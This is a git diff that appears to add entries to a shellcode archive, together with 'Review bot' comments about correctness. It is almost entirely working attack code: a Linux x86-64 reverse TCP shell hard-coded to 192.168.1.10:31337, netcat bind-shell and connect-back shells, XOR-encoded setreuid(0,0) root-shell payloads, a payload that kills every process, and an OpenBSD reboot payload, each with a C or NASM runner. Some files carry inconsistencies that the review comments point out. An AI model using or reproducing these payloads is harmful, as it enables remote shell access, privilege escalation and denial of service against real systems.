+"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
+"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
+"\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02"
+PORT"\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05"
+"\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31"
+"\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59"
+"\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48"
+"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
+"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
+"\x5f\x6a\x3b\x58\x0f\x05";
+
+int
+main(void)
+{
+ printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
+ int (*ret)() = (int(*)())code;
+ ret();
+ return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/43599.c b/shellcodes/linux_x86-64/43599.c
new file mode 100644
index 000000000..ca464aea2
--- /dev/null
+++ b/shellcodes/linux_x86-64/43599.c
@@ -0,0 +1,92 @@ +/* +Title : reversetcpbindshell (118 bytes) +Date : 04 October 2013 +Author : Russell Willis +Testd on: Linux/x86_64 (SMP Debian 3.2.46-1+deb7u1 x86_64 GNU/Linux) + +$ objdump -D reversetcpbindshell -M intel +reversetcpbindshell: file format elf64-x86-64 +Disassembly of section .text: + +0000000000400080 <_start>: + 400080: 48 31 c0 xor rax,rax + 400083: 48 31 ff xor rdi,rdi + 400086: 48 31 f6 xor rsi,rsi + 400089: 48 31 d2 xor rdx,rdx + 40008c: 4d 31 c0 xor r8,r8 + 40008f: 6a 02 push 0x2 + 400091: 5f pop rdi + 400092: 6a 01 push 0x1 + 400094: 5e pop rsi + 400095: 6a 06 push 0x6 + 400097: 5a pop rdx + 400098: 6a 29 push 0x29 + 40009a: 58 pop rax + 40009b: 0f 05 syscall + 40009d: 49 89 c0 mov r8,rax + 4000a0: 48 31 f6 xor rsi,rsi + 4000a3: 4d 31 d2 xor r10,r10 + 4000a6: 41 52 push r10 + 4000a8: c6 04 24 02 mov BYTE PTR [rsp],0x2 + 4000ac: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a + 4000b3: c7 44 24 04 0a 33 35 mov DWORD PTR [rsp+0x4],0x435330a + 4000ba: 04 + 4000bb: 48 89 e6 mov rsi,rsp + 4000be: 6a 10 push 0x10 + 4000c0: 5a pop rdx + 4000c1: 41 50 push r8 + 4000c3: 5f pop rdi + 4000c4: 6a 2a push 0x2a + 4000c6: 58 pop rax + 4000c7: 0f 05 syscall + 4000c9: 48 31 f6 xor rsi,rsi + 4000cc: 6a 03 push 0x3 + 4000ce: 5e pop rsi +00000000004000cf : + 4000cf: 48 ff ce dec rsi + 4000d2: 6a 21 push 0x21 + 4000d4: 58 pop rax + 4000d5: 0f 05 syscall + 4000d7: 75 f6 jne 4000cf + 4000d9: 48 31 ff xor rdi,rdi + 4000dc: 57 push rdi + 4000dd: 57 push rdi + 4000de: 5e pop rsi + 4000df: 5a pop rdx + 4000e0: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f + 4000e7: 2f 73 68 + 4000ea: 48 c1 ef 08 shr rdi,0x8 + 4000ee: 57 push rdi + 4000ef: 54 push rsp + 4000f0: 5f pop rdi + 4000f1: 6a 3b push 0x3b + 4000f3: 58 pop rax + 4000f4: 0f 05 syscall + + Code not is not optimal, this is left as an exercise to the reader ;^) + +*/ + +#include + +#define IPADDR "\xc0\x80\x10\x0a" /* 192.168.1.10 */ +#define PORT "\x7a\x69" /* 31337 */ + +unsigned char code[] = \ 
+"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
+"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
+"\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24"
+"\x02"PORT"\xc7\x44\x24\x04"IPADDR"\x48\x89\xe6\x6a\x10"
+"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48"
+"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
+"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
+"\x5f\x6a\x3b\x58\x0f\x05";
+
+int
+main(void)
+{
+ printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
+ int (*ret)() = (int(*)())code;
+ ret();
+ return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/43601.asm b/shellcodes/linux_x86-64/43601.asm
new file mode 100644
index 000000000..8ca1c6d38
--- /dev/null
+++ b/shellcodes/linux_x86-64/43601.asm
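Review bot: The comment on `#define IPADDR "\xc0\x80\x10\x0a" /* 192.168.1.10 */` does not match the bytes: `c0 80 10 0a` is 192.128.16.10, whereas 192.168.1.10 would be `c0 a8 01 0a`, and the objdump reproduced in the header was built with a third address (`0x435330a`, i.e. 10.51.53.4). Make the comment state what the macro actually encodes, and note that the header listing comes from a different build, so the three values in this file stop contradicting each other. `PORT` is consistent (`7a 69` is 31337 in network byte order), so only the address line needs touching.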
@@ -0,0 +1,64 @@ +; { Title: Shellcode linux/x86-64 bind-shell with netcat } + +; Author : Gaussillusion +; Len : 131 bytes +; Language : Nasm + + + +BITS 64 +xor rdx,rdx +mov rdi,0x636e2f6e69622fff +shr rdi,0x08 +push rdi +mov rdi,rsp + +mov rcx,0x68732f6e69622fff +shr rcx,0x08 +push rcx +mov rcx,rsp + +mov rbx,0x652dffffffffffff +shr rbx,0x30 +push rbx +mov rbx,rsp + +mov r10,0x37333331ffffffff +shr r10,0x20 +push r10 +mov r10,rsp + +mov r9,0x702dffffffffffff +shr r9,0x30 +push r9 +mov r9,rsp + +mov r8,0x6c2dffffffffffff +shr r8,0x30 +push r8 +mov r8,rsp + +push rdx ;push NULL +push rcx ;push address of 'bin/sh' +push rbx ;push address of '-e' +push r10 ;push address of '1337' +push r9 ;push address of '-p' +push r8 ;push address of '-l' +push rdi ;push address of '/bin/nc' + +mov rsi,rsp +mov al,59 +syscall + +; _bytecode_start_ +;\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63 +;\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb9\xff\x2f\x62 +;\x69\x6e\x2f\x73\x68\x48\xc1\xe9\x08\x51\x48\x89\xe1 +;\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65\x48\xc1\xeb +;\x30\x53\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33 +;\x33\x37\x49\xc1\xea\x20\x41\x52\x49\x89\xe2\x49\xb9 +;\xff\xff\xff\xff\xff\xff\x2d\x70\x49\xc1\xe9\x30\x41 +;\x51\x49\x89\xe1\x49\xb8\xff\xff\xff\xff\xff\xff\x2d +;\x6c\x49\xc1\xe8\x30\x41\x50\x49\x89\xe0\x52\x51\x53 +;\x41\x52\x41\x51\x41\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05 +; _bytecode_end_ \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43602.asm b/shellcodes/linux_x86-64/43602.asm new file mode 100644 index 000000000..48d3516e6 --- /dev/null +++ b/shellcodes/linux_x86-64/43602.asm 
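Review bot: This listing has no comment stating the call it constructs, whereas its sibling 43602.asm opens with `;syscall: execve("/bin/nc",{"/bin/nc","ip","1337","-e","/bin/sh"},NULL)`; here the reader has to reconstruct it from the seven pushes before `mov rsi,rsp`. Add the matching line under the header: `;syscall: execve("/bin/nc",{"/bin/nc","-l","-p","1337","-e","/bin/sh"},NULL)`. The inline comment `;push address of 'bin/sh'` also drops the leading slash of the string the code builds (`0x68732f6e69622fff` shifted right by 8 is `/bin/sh`, NUL-terminated).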
@@ -0,0 +1,62 @@ +; { Title: Shellcode linux/x86-64 connect back shell } + +; Author : Gaussillusion +; Len : 109 bytes +; Language : Nasm + +;syscall: execve("/bin/nc",{"/bin/nc","ip","1337","-e","/bin/sh"},NULL) + +BITS 64 +xor rdx,rdx +mov rdi,0x636e2f6e69622fff +shr rdi,0x08 +push rdi +mov rdi,rsp + +mov rcx,0x68732f6e69622fff +shr rcx,0x08 +push rcx +mov rcx,rsp + +mov rbx,0x652dffffffffffff +shr rbx,0x30 +push rbx +mov rbx,rsp + +mov r10,0x37333331ffffffff +shr r10,0x20 +push r10 +mov r10,rsp + +jmp short ip +continue: +pop r9 + +push rdx ;push NULL +push rcx ;push address of 'bin/sh' +push rbx ;push address of '-e' +push r10 ;push address of '1337' +push r9 ;push address of 'ip' +push rdi ;push address of '/bin/nc' + +mov rsi,rsp +mov al,59 +syscall + + +ip: + call continue + db "127.0.0.1" + + +;______________________bytecode_______________________ +;\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63 +;\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb9\xff\x2f\x62 +;\x69\x6e\x2f\x73\x68\x48\xc1\xe9\x08\x51\x48\x89\xe1 +;\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65\x48\xc1\xeb +;\x30\x53\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33 +;\x33\x37\x49\xc1\xea\x20\x41\x52\x49\x89\xe2\xeb\x11 +;\x41\x59\x52\x51\x53\x41\x52\x41\x51\x57\x48\x89\xe6 +;\xb0\x3b\x0f\x05\xe8\xea\xff\xff\xff\x31\x32\x37\x2e +;\x30\x2e\x30\x2e\x31 +;______________________bytecode_______________________ \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43603.c b/shellcodes/linux_x86-64/43603.c new file mode 100644 index 000000000..c68ad2ea0 --- /dev/null +++ b/shellcodes/linux_x86-64/43603.c 
@@ -0,0 +1,14 @@ +# Title: Linux x86-64 setreuid (0,0) & execve("/bin/ash",NULL,NULL) + XOR encoded - 85 bytes +# Author: egeektronic +# Twitter: @egeektronic +# Tested on: Slackware 13.37 +# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer + +unsigned char shellcode[] = +"\x4d\x31\xc0\x41\xb1\x7f\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb" +"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48" +"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x37\x4e\xbf\x37\xfc\xbf" +"\x0e\x37\x4e\x80\x37\x4e\x89\x70\x7a\x94\x6f\x37\x4e\xbf\x37" +"\xfc\xbf\x44\x20\x37\x4e\x89\x37\x4e\xad\x70\x7a\x97\x94\x80" +"\x80\x80\x50\x1d\x16\x11\x50\x1e\x0c\x17"; +int main(void) { ((void (*)())shellcode)(); } \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43604.c b/shellcodes/linux_x86-64/43604.c new file mode 100644 index 000000000..765b89b34 --- /dev/null +++ b/shellcodes/linux_x86-64/43604.c @@ -0,0 +1,14 @@ +# Title: Linux x86-64 setreuid (0,0) & execve("/bin/csh", ["/bin/csh", NULL]) + XOR encoded - 87 bytes +# Author: egeektronic +# Twitter: @egeektronic +# Tested on: Slackware 13.37 +# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer + +unsigned char shellcode[] = +"\x4d\x31\xc0\x41\xb1\xe3\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb" +"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48" +"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\xab\xd2\x23\xab\x60\x23" +"\x92\xab\xd2\x1c\xab\xd2\x15\xec\xe6\x08\xf1\xab\xd2\x23\xab" +"\x60\x23\xd8\xbc\xab\xd2\x31\xb1\xb4\xab\x6a\x05\xec\xe6\x0b" +"\x0a\x1c\x1c\x1c\xcc\x81\x8a\x8d\xcc\x80\x90\x8b"; +int main(void) { ((void (*)())shellcode)(); } \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43605.c b/shellcodes/linux_x86-64/43605.c new file mode 100644 index 000000000..387db9434 --- /dev/null +++ b/shellcodes/linux_x86-64/43605.c 
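Review bot: The header lines beginning with `#` (`# Title:`, `# Author:`, `# Twitter:`, `# Tested on:`, `# Thanks:`) are preprocessor directives in a `.c` file, not comments, so the file stops at preprocessing with an invalid-directive error before `shellcode[]` is ever parsed; 43604.c, 43605.c, 43606.c and 43607.c carry the same header. Wrap the block in `/* … */` or prefix each line with `//`, as 43608.c does with its `//` banner.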
@@ -0,0 +1,14 @@ +# Title: Linux x86-64 setreuid (0,0) & execve("/bin/ksh", ["/bin/ksh", NULL]) + XOR encoded - 87 bytes +# Author: egeektronic +# Twitter: @egeektronic +# Tested on: Slackware 13.37 +# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer + +unsigned char shellcode[] = +"\x4d\x31\xc0\x41\xb1\x17\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb" +"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48" +"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x5f\x26\xd7\x5f\x94\xd7" +"\x66\x5f\x26\xe8\x5f\x26\xe1\x18\x12\xfc\x05\x5f\x26\xd7\x5f" +"\x94\xd7\x2c\x48\x5f\x26\xc5\x45\x40\x5f\x9e\xf1\x18\x12\xff" +"\xfe\xe8\xe8\xe8\x38\x75\x7e\x79\x38\x7c\x64\x7f"; +int main(void) { ((void (*)())shellcode)(); } \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43606.c b/shellcodes/linux_x86-64/43606.c new file mode 100644 index 000000000..4733fb2e4 --- /dev/null +++ b/shellcodes/linux_x86-64/43606.c @@ -0,0 +1,14 @@ +# Title: Linux x86-64 setreuid (0,0) & execve("/bin/zsh", ["/bin/zsh", NULL]) + XOR encoded - 87 bytes +# Author: egeektronic +# Twitter: @egeektronic +# Tested on: Slackware 13.37 +# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer + +unsigned char shellcode[] = +"\x4d\x31\xc0\x41\xb1\x3c\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb" +"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48" +"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x74\x0d\xfc\x74\xbf\xfc" +"\x4d\x74\x0d\xc3\x74\x0d\xca\x33\x39\xd7\x2e\x74\x0d\xfc\x74" +"\xbf\xfc\x07\x63\x74\x0d\xee\x6e\x6b\x74\xb5\xda\x33\x39\xd4" +"\xd5\xc3\xc3\xc3\x13\x5e\x55\x52\x13\x46\x4f\x54"; +int main(void) { ((void (*)())shellcode)(); } \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43607.c b/shellcodes/linux_x86-64/43607.c new file mode 100644 index 000000000..070a1cc4c --- /dev/null +++ b/shellcodes/linux_x86-64/43607.c 
@@ -0,0 +1,43 @@ +# Linux/x86_64 sethostname() & killall 33 bytes shellcode +# Date: 2010-04-26 +# Author: zbt +# Tested on: x86_64 Debian GNU/Linux + + +/* + ; sethostname("Rooted !"); + ; kill(-1, SIGKILL); + + + section .text + global _start + + _start: + + ;-- setHostName("Rooted !"); 22 bytes --; + mov al, 0xaa + mov r8, 'Rooted !' + push r8 + mov rdi, rsp + mov sil, 0x8 + syscall + + ;-- kill(-1, SIGKILL); 11 bytes --; + push byte 0x3e + pop rax + push byte 0xff + pop rdi + push byte 0x9 + pop rsi + syscall +*/ +int main(void) +{ + char shellcode[] = + "\xb0\xaa\x49\xb8\x52\x6f\x6f\x74\x65\x64\x20\x21\x41\x50\x48\x89" + "\xe7\x40\xb6\x08\x0f\x05\x6a\x3e\x58\x6a\xff\x5f\x6a\x09\x5e\x0f\x05"; + + (*(void (*)()) shellcode)(); + + return 0; +} \ No newline at end of file diff --git a/shellcodes/openbsd_x86/43608.c b/shellcodes/openbsd_x86/43608.c new file mode 100644 index 000000000..8a8735ec7 --- /dev/null +++ b/shellcodes/openbsd_x86/43608.c @@ -0,0 +1,18 @@ +// ----------bsd/x86 reboot() shellcode----------------- + +// AUTHOR : beosroot +// INFO : OpenBSD x86 reboot() shellcode +// EMAIL : beosroot@null.net +// beosroot@hotmail.fr + + +char shellcode[] = "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80"; + +int main() { + + int *ret = (int *)&ret + 2; + (*ret) = (int)shellcode; +} + + +// the end o.O \ No newline at end of file
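Review bot: The harness in `43608.c` patches its own return address with `int *ret = (int *)&ret + 2; (*ret) = (int)shellcode;`, which only lines up on a 32-bit frame where the saved return address sits two `int` slots above `ret` and a pointer fits in an `int`; on an x86-64 or optimized build the offset is wrong and `(int)shellcode` truncates the pointer, so the program returns or crashes without running the bytes. The file names OpenBSD x86 but says nothing about the frame layout it relies on; a comment such as `/* assumes a 32-bit build that keeps the frame pointer; layout-dependent */` on the `ret` line would make the dependence explicit.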